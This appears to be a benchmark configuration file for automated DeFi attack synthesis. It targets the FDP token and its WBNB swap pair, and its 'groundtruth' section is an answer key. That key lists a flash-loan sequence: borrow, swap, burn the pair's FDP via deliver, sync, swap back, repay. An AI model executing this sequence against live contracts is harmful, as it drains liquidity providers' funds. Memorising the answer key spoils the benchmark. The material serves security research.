# Information for benchmarks building.
project_name: "FDP"

ctrt_name2cls:
  - ["fdp", "FDP"]
  - ["wbnb", "WBNB"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["fdp", "new FDP()"]
  - ["wbnb", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function burn_pair_fdp(uint256 amount) internal {
    fdp.deliver(address(pair), amount);
    }"

extra_deployments: []
extra_constraints: []

attack_goal: "wbnb.balanceOf(attacker) >= 1e18 + balanceOfwbnbattacker"

groundtruth:
  - ["borrow", "wbnb", "16.32e18"]
  - ["swap", "pair", "wbnb", "fdp", "wbnb.balanceOf(attacker)"]
  - ["burn", "pair", "fdp", "28463.16e18"]
  - ["sync", "pair"]
  - ["swap", "pair", "fdp", "wbnb", "32.44e18"]
  - ["payback", "wbnb", "16.32e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "wbnb":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "fdp":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_burnable: true
  "pair":
    is_swappair: true
    uniswap_order: ["fdp", "wbnb"]
    support_swaps:
      "wbnb": ["fdp", "wbnb"]
      "fdp": ["fdp", "wbnb"]
    is_oracle: true

pattern: "Token Burn"
